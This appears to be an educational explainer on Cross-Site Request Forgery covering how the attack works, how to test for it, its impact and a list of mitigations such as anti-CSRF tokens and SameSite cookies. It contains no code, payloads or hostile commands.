What is CSRF?

CSRF stands for Cross-Site Request Forgery. It is a type of security vulnerability that occurs
when an attacker tricks a user's web browser into making an unwanted request to a web
application in which the user is authenticated. The attacker essentially forges a request on
behalf of the victim, leading to actions being performed on the web application without the
user's knowledge or consent.

Here's a basic scenario to illustrate how CSRF works:

1. The victim logs into a web application and receives a session cookie that authenticates
them.

2. While still authenticated, the victim visits a malicious website controlled by the attacker.

3. The malicious website contains code that automatically sends a request (e.g., changing
email/password, making a purchase, etc.) to the targeted web application on behalf of
the authenticated victim.

4. The victim's browser, unaware of the malicious request, includes the victim's
authentication cookie, making the request appear legitimate to the targeted web
application.

5. The web application, seeing a valid session cookie, processes the request as if it came
from the legitimate user, leading to unintended actions being taken on the user's
behalf.
To mitigate CSRF attacks, web developers can implement measures such as anti-CSRF
tokens. These tokens are unique values associated with a user's session and are required for
each sensitive action. When a user submits a form or performs an action, the anti-CSRF token
is checked to ensure the request is legitimate.
How does CSRF attack work?

A Cross-Site Request Forgery (CSRF) attack typically involves an attacker tricking a victim's
browser into making an unintended and potentially malicious request to a web application
where the victim is authenticated. Here's a step-by-step explanation of how a CSRF attack
works:

1. User Authentication:

 The victim logs into a web application, such as an online banking site, and
obtains a session cookie that authenticates them.

2. Attacker Preparation:

 The attacker creates a malicious website or compromises a legitimate one. This

website may contain malicious code, such as JavaScript, hidden forms, or
image tags.

3. Malicious Payload:

 The malicious website created by the attacker contains a payload that is

designed to perform a specific action on the target web application. This could
be actions like changing the victim's password, making a purchase, or
initiating a fund transfer.
4. Tricking the Victim:

 The attacker entices the victim to visit the malicious website. This can be done
through phishing emails, social engineering, or other means.

5. Unintended Request:

 When the victim visits the malicious website, the payload is executed
automatically. This payload typically involves making a request to the target
web application, exploiting the fact that the victim is already authenticated.

6. Use of Victim's Authentication:

 The victim's browser, being unaware of the malicious request, includes the
authentication credentials (usually in the form of session cookies) for the target
web application.

7. Web Application Processing:

 The target web application receives the malicious request, and since it comes
with valid authentication credentials, it processes the request as if it were a
legitimate action initiated by the authenticated user.

8. Unauthorized Action:

 The web application performs the unintended action, such as changing the
victim's password, initiating a financial transaction, or making changes to the
victim's account settings.
How do you test for CSRF vulnerability?

Testing for CSRF (Cross-Site Request Forgery) vulnerabilities involves simulating scenarios
where an attacker might attempt to forge unauthorized requests on behalf of a user. Here are
some common methods and techniques for testing CSRF vulnerabilities:

1. Manual Testing:

 Manually inspect the web application to identify forms or actions that perform
sensitive operations (changing passwords, making transactions, etc.).

 Manually submit requests using tools like cURL, Postman, or browser

developer tools to observe the application's behavior.

\
2. Burp Suite or Similar Proxy Tools:

 Use proxy tools like Burp Suite to intercept and modify requests between the
browser and the web application.

 Manually manipulate form parameters, including those related to

authentication tokens, to observe the application's response.
3. Automated Scanning Tools:

 Use automated security scanning tools that include CSRF testing capabilities.
Tools like OWASP ZAP, Nessus, or Acunetix can automatically identify and
test for CSRF vulnerabilities.
4. CSRF PoC (Proof of Concept) Exploits:

 Develop custom proof-of-concept exploits to demonstrate the presence of

CSRF vulnerabilities. This involves creating HTML or JavaScript code that,
when executed, sends unauthorized requests to the target application.

5. Check Anti-CSRF Token Implementation:

 If the application uses anti-CSRF tokens, test whether they are implemented
correctly. Attempt to submit requests without the proper token or with an
expired token to see if the application rejects them.
What is the impact and mitigations?

Impact of CSRF Vulnerabilities:

1. Unauthorized Actions:

 The primary impact of a CSRF attack is the ability for an attacker to perform
unauthorized actions on behalf of a user without their knowledge or consent.
This can lead to changes in user account settings, password resets, financial
transactions, or other sensitive operations.

2. Data Integrity and Confidentiality:

 CSRF attacks can compromise the integrity and confidentiality of user data,
leading to unauthorized access or manipulation of sensitive information.

3. Session Impersonation:

 An attacker can use CSRF to impersonate a user and perform actions as if they
were the legitimate user. This may lead to further exploitation of the user's
privileges and access rights.

4. Trust Erosion:

 CSRF attacks erode user trust in a web application, as users may not be aware
that actions are being performed on their behalf without their explicit consent.

Mitigations for CSRF Vulnerabilities:

1. Use Anti-CSRF Tokens:

 Implement anti-CSRF tokens as part of your web application's security

mechanisms. These tokens are unique and associated with a user's session,
making it more difficult for attackers to forge requests.

2. SameSite Cookies Attribute:

 Set the SameSite attribute for cookies to control whether they are sent with
cross-site requests. Setting it to "Strict" or "Lax" can help prevent certain types
of CSRF attacks.

3. Custom Headers:

 Use custom headers, such as the "X-Requested-With" header, to validate the

origin of requests. Ensure that your server-side code checks for these headers
and rejects requests without them.

4. Check Referrer Header:

 While not foolproof, checking the Referer header for same-origin validation
can add an additional layer of protection. However, note that this header is not
always reliable as it can be easily manipulated.

5. Implement Same-Origin Policy:

 Enforce the Same-Origin Policy to prevent the execution of scripts from

different origins. This can help mitigate the risk of cross-site request forgery.

6. Require Reauthentication for Sensitive Actions:

 For particularly sensitive actions, consider requiring users to reauthenticate

before allowing the action to proceed. This adds an extra layer of security,
especially for critical operations.

7. Educate Users:

 Educate users about the risks of clicking on suspicious links or visiting

untrusted websites. Awareness can help users avoid falling victim to CSRF
attacks.
 8. Security Headers:

 Implement security headers such as Content Security Policy (CSP) to control

which scripts are allowed to run on a page, reducing the risk of malicious
scripts executing.

9. Regular Security Audits and Testing:

 Conduct regular security audits and testing, including penetration testing and
code reviews, to identify and address potential CSRF vulnerabilities.

10. Use HTTPS:

 Ensure that your web application uses HTTPS to encrypt data in transit,
preventing attackers from intercepting and modifying requests.

Reference:

https://portswigger.net/web-security/csrf

https://www.cloudflare.com/learning/security/threats/cross-site-request-forgery/

https://www.imperva.com/learn/application-security/csrf-cross-site-request-forgery/

https://owasp.org/www-community/attacks/csrf

https://brightsec.com/blog/cross-site-request-forgery-csrf/